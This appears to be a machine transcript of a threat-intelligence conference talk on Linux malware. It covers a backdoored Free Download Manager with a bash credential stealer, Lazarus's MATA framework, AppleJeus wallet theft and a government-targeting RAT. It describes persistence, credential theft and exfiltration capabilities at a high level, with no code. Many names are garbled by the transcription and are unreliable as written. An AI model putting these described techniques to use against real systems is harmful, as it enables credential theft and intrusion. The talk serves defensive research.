Linux Under Siege: Analyzing the Latest Cyber Espionage Tactics and Malware Trends

nice okay let's start so sorry for my voice last week I was really sick I'm still recovering but um I hope everyone can can hear me so my name is Mark I'm coming from from Spain from Barcelona and the idea for the presentation is to is to Showcase everyone uh some threats around the the Linux ecosystem so just to make a little survey who is using Linux as a primary system here hands up Mac OS windows and for the people that is using Linux you are using an antivirus on the system or not an antivirus an import solution and security no right there is no Mar for Linux who cares okay so let's just start so um

basically um I'm part of the great team uh we are a distributor Team all around the wall and we are analyzing uh threats we uncovered the major uh cyber threat operations historically uh check out sec.com for the latest reports and the most interesting recent one uh it's about uh operation triangulation uh a consecutive of zero days targeting the latest updated iPhones so um that was really cool um here are my colleagues uh who are also contri contributing of course uh to those investigation as I said I'm based on on Spain so when we talk about threats uh we talk about these different kind of things right I mean downloaders exploits dware mobile marware back door fishing

Trojan right by don't these are some of the wars around the cyber security thingy and the Cyber threat operation s uh depending on what are you investigating you will find one or multiple of these words around your investigation but basically these are the threats around the different operations that we investigate if we take a look at the numbers these are just numbers it's just to to make a measure about what what are we talking about these statistics are uh collected at the end of December 2023 so we I didn't put the the statistic for the for the whole year because we didn't finish but um we have a few numbers about the different online attacks that

we detected different malicious URLs mobile malware ramare attacks Etc uh just to make a number we detected uh U closely to 700,000 unique Linux marwel files uh targeting that ecosystem meaning that there are lot of interest by the by the threat actors uh either kware or estate sponsor to also Target that that ecosystem so if we make uh this this slide is is interesting because I want to make a difference between uh I mean when when you are investigating something you you you may believe it could be targeted you may believe it could be State sponsor but at the end of the day what we are seeing is that the 80% of the threats are crw when we talk

about crw we talk about DSW steer exer cryptojacking crypto mining all all all the stuff that can be collected and sell to other cyber criminal like the L access broker uh the fishing attacks the Stealers that are selling uh credentials blah blah blah blah Ram someware stuff all of this is scanware uh that mostly closely to 20% are targeted attacks that means that uh our attacks that are prepared for a specific organization and and only the 0.1% it's AP so as as you can see it's like the to find sometimes it's hard to find those kind of attacks because of the numbers compared to what they find about crw so I'm I'm sure that some of

you you are on the research field maybe you spend like a two weeks uh investigating something and then you figure out that was Cal strike I'm sorry I mean sometimes happen but uh it's part of our uh history so I I guess we are living on the new era of multiplatform uh mware so it doesn't matter that you are running uh Mac OS windows or Linux we have threats for the for the three different scenarios uh the kangan AP landscape offers right now Mal malware for the three different platforms even even major AP groups like Lazarus uh have their own compiled versions for for maos meaning that they have also interest on users running these kind of uh platforms

uh even the ramw groups and lit was the first one in the history that gave support uh with his rware to the APLE M1 uh system so a Arm System also affected by by this if we take the perspective from an organization all the confidential data are important data is uploaded at the end of the day to Linux system we are talking about uh virtualization systems CNET clusters vital data centers blah blah blah all the web service and and important systems are based on Linux so the L ecosystem is a reality for the for the bad

guys if we talk about infection vectors uh here few few examples publish it by the by the Comm the community we have an excellent research made by the by the tag team at Google where they uh presented a campaign that uh uh a North Korean speaking group was targeting researchers over the social networks uh basically exchanging messages with with them in order to infect those people because usually the researcher we have access to really sensitive data and we have access to really cool companies and that's why we are all Al a target of the nation state sponsored actors also we have another example for the genome lus ecosystem where uh the bad guys infected some files related to

to this desktop environment and basically they had a zero day uh targeting for for people using using genome also the Spanish thir also uh rais it an a um an alert for everyone about lck bit Locker uh that was distributed uh after the users fall fall on a on fishing attacks basically as the lby Builder was leaked uh anyone can make their own Ras marw right now and they can create their own compiled Ops and that's why we are seeing lot of low tire criminals that are using lick builder of RW families to to also create their own their own build business also we have a campaign that I will explain right now today it's about

the free download manager that is that is a campaign that we detected that infected millions of users worldwide uh for years and and also is another interesting campaign where they use it uh H fake Z fake Z PC exploits uh on GitHub P GitHub push for Windows Linux and malware you want to follow this us in metre you can use this uh uh ttp's uh IDs so uh what happened every time that the the the industry suffers a suppl uh chain attack so recently we could see this uh X set utils package that was uh infected by well we still don't know the the bad guy behind it but basically they were for years preparing that campaign and

they managed to uh include the package on some of the major uh Linux system so we had the package uh available on deian testing and luckily one engineer from Microsoft uh because their connection to the server was a few seconds uh uh late uh he managed to discover one of the latest and major threats in our IND industry and they managed to back door uh one of the main um packages use it to uh compress file in a in a Linux system so the supply chain attacks are really dangerous and we have to take care about uh if we use it in our organization so this this is a case that we discover uh for the free download manager uh so

basically uh we figured out that uh a few rare domains were available and these domains were similar to to the ones created by a domain generation algorithm and we decided to investigate a little bit what's going on behind those uh new domains available for everyone so basically what we what we discovered is that uh one of the popular fre down manager for Linux was infected we still don't know how this happened because this happened I mean the the the first or the or the patient Z the passion zero for this was like many years ago and basically we also um find find out uh post on Reddit on other forums for people that was discussing

about this but they didn't know that they were discussing about the mar itself they were like blaming the community about the freedom manager that's that were not working or some SCP were not available and the thing is that the bad guys managed to modify the the official website for free download manager to redirect some users um of course uh um because they had like a special fingerprint like uh they were coming from a specific countries or they were coming from a specific operating systems uh for some of them uh the page just offer the back door version of the free download manager that is quite dangerous to investigate and it's quite hard to investigate because uh uh you

have to accomplish certain certain characteristics in order to get the official uh malware so basically um this uh threat starts with the configuring a crown on the on the system that will be checking every time if the system has certain things like new pathwords or new configuration files in order to to be ested by the by the campaign and what they um also the project to the system was a bash stealer that was checking for certain files on the system like Opa passwords or Chrome passwords or Google Cloud passwords or Azure password basically all of the kind of wallets and um password files that we have stored in our Linux systems as a configuration file because we needed to access to

those platforms this B steer was stealing all of these credentials and sending them to the attackers in order to use use it in other operations like for example the use the usage of this infrastructure to perform other attacks or to sell this information to to to third parties so basically that was the idea of the of the campaign The Bash steer is quite simple so um basically we'll yes hello yes so um basically um the B script uh looks like this so it will check uh lot of lot of uh files and and folders in the system in order to just copy all the that files and compy files and send them back to the to the

server another interesting history is about the Mata Factor so Mata is a multiplatform uh framework that uh has support for for Windows Linux and and Mac OS and basically uh Mata is tired to to the Lazarus to the Lazarus AP uh group it was discovered around uh 2018 and the actor behind this is uh is an advanced marel framework that uh is uh it was being used to aggressively infiltrate two corporate entities around the world so the marel framework uh possess several components uh as I said is has support for Windows Linux and and Mac OS um the framework has different tooling available um a loader an orchestrator it has support for plugin so you can extend the functionalities of

the of the framework and has support for Linux Mac OS uh and windows and it's it use support or historical uh tools like soat that is more maybe us it for system administration and also for pen testing but the these guys also included a modified version of soat to be us in in their operations as a big theology we can find like really interesting targets including internet service providers e-commerce big e-commerce uh websites defense contractors in Europe and also software development companies so companies that has really sensitive data around it this is the framework or the architecture for for the windows version just to make sure that you guys understand the capabilities of the of

the Mata framework so we are talking about a complex architecture that has different capabilities for the for the attackers and the idea is that they have like a platform that they can use to do multiple operations on big on big companies the Mata framework can be run independently but they can also connect different Mata framework uh scenarios using using what they call matet that it's uh Network architecture to also communicate between uh mata mata servers so basically they have capabilities to uh use web Proxes to also use uh uh solar TCP connections to send and and get files they can also um use different plugins to for example uh U modify or or get files on the system so basically

they can do whatever they want controlling the machine remotely with with Mata to do whatever whatever they want so uh during the during the investigation we find out that uh we we found a bundle package that contained uh the the whole ecosystem of of mattera we are talking about all the plugins and all the and all the files related to the to the windows versions but also an uncovered we uncovered also a a a a a version a version working for for

Linux the the Linux version contained different exploits for the atashian uh Suite so basically uh what we ass say that they were exploiting also atlassian servers in order to deploy uh Mata or upon they had access to the company if they find out that an internal uh server running at lashan they exploited the the service to infect the server with with the with the matab back door as I said uh they also use it tools like soat to hide the the connections uh internally the functionality for the Linux version is to run as a as a demo and also they have a they have uh utilities like a process Checker to check if the m the framework is uh

running and if not launch it in case uh for whatever reason the process is suspended on the on the system it has ability to also uh work with iot devices and router systems in order to infect it and be let's say under the r for for more time it has different uh plugins the Linux pressure is not as mass capable as the windows one because of the architecture but it has like really interesting features like a man manage files manage processes also to test plugins and also do uh rice connections to the to the system also uh analyzing the the bundle package we find out a version for for maos basically what the what Lazarus

made is to back door one of the uh tools that that are used to to have like an OTP software on the desktop to manage your OTP codes basically to access your favorite services like Google cloud or or any of the services that allows GE Factor authentication and we find out that the that the sorry that the the application was back by by by Mata when we talk about the attribution how we TI It uh to Lazarus is because they were using two unique files represented here uh with a high uh view basically we find out that uh the bad guy uh reused some of the files used by by lazerus and that's why how we made

the first uh attribution to the to the group and the other one is because of the manuscript uh configuration file basically Mata is using the same uh config structure so so we know that the same development team is behind the the malw um I don't know if you are aware of this but um laus has like uh two groups one of them is the one that we know to be that is conducting AP campaigns uh all around the world to infect different interesting uh companies and the other one is what we call lunov that that are it's like a subdivision that the the main purpose is to uh get money uh for example from cryptocurrency and this

kind of a stuff in order to fund or sell fund their own operations because at the end to pay developers to pay infrastructure to pay resources un need money so you have a subdivision that is getting money for you you are a really proficiency uh group and that's why there is a s of lazaros doing that so apple jaos is another uh example of uh uh campaigns that are targeting not only windows but Linux and and Mac OS systems basically uh uh what this campaign does is to uh modify uh it's a fake application that the the user will be using to uh work with his exchange and basically what the application will do is to steal the wallet from the user

and send it back to the Lazarus guys in order to steal all the money basically this happened with uh with Lazarus uh multiple times so basically we made the tribution because um apple J was uh for the Linux and Ma version was reusing the same suu servers are as as the windows version so it's common for the for the groups to reuse uh infrastructure they were using the same short key to encryp and thep the the data and the the Apple jail sample had functionalities like to sleep to be dormant on the system uh upon some event some interesting event happen in the system it has a herit to be communicating with the command and

control server in order to check if there is any new task or order that are that is prepared by the by the operator it has the ability to receive to receive and send files from from the system for the path and on the file system that the marware has access and also it has ability to execute commands directly in the system for example to delete traces or to also create files on the system during the during the infection the the ma version was the distributed uh using malicious apps for example buying fake domains and then uh using Google ads or other techniques to point the users to download the fake applications but we still don't know how

they manage to uh for the users to uh use uh the the back door version for for Linux so uh this is a configuration file that we had for Apple jails basically we had the uh one uh hi hideen up inside the bundle and every time the user triy to execute the real application they were starting the fake Apple Jo sample on background and the latest um campaign it's about what we call doodas rat so um basically these are special rout that targets the Linux ecosystem is really I mean it has a lot of functionalities and is really useful for the for the attackers um the guys behind it only targets specifically government entities so they are interested on target the

government uh it's a binary that is inside an attachment file that is sent through speed fishing so basically they profile the victim and when they believe they have something for for the victim they send spe fishing and the another rat is inside the SP fishing attachment um the main purpose of the Rat is to collect sensitive information from the from the victim basically uh every time he infects a a computer um it starts creating a loog file with the date of infection and also does an md5 hash of the the the the MDI de code uh command that should be unique for the for the system and also assigns a random number as an ID in order to identify the

the victim in order to do that ex filtration um what what the do R does is to check it has root permission or not because basically depending on your permission level you can access to some kind of the systems or or other path so you are not root you you cannot access to plock user or other path and if you are rote you can and if you are not roote you can access to op or similar so basically just to not waste the time to read and an access to the system and maybe to avoid any alert if the big te has any uh endpoint solution uh installed it has the capability to use uh proxies so if the server has any

corporate proxy configure you know that rat has a support to just uh pass information using the corporate proxy and it's using um encryption library that uh uh is also using with the popular uh IM uh messenger known as pigeon so just to make sure that uh uh we we all understand which capabilities the the rat has basically has a file management capability to uh enumerate the different files in the in the system but also to upload files in the system like any other marware any other utility any other Factor any other exploit that is interesting for the for the attacker uh it could also lock any activity for the back proposes and to improve the rat

execution in the system uh in terms of network it has ability to do any kind of that we can imagine like use the proxy or to send files even to measure the speed of the network to make sure that the the attacker can calculate how many time he needs to upload any file in the system and also a latest thing it has any like a needed capability to interact with processes and services in the system to check which is the username that is used for login to a numerated process to startop processes to start services to do whatever he needs to interact with the with the system so as you can see we we can find a complete R

solution only only designed to the Linux ecosystem and only targeted targeting government entities so as I said the Linux ecosystem contains all the sensitive and confidential information and that's why the AP the the state sponsor actors are really interested on on this ecosystem um they they are also targeting of course manage Cloud infrastructure like aour Google cloud or Amazon but uh they have really interesting uh like Focus to Target these uh Linux servers and that's it I hope you guys listening I'm really ding so apologize for that so any question really happy to be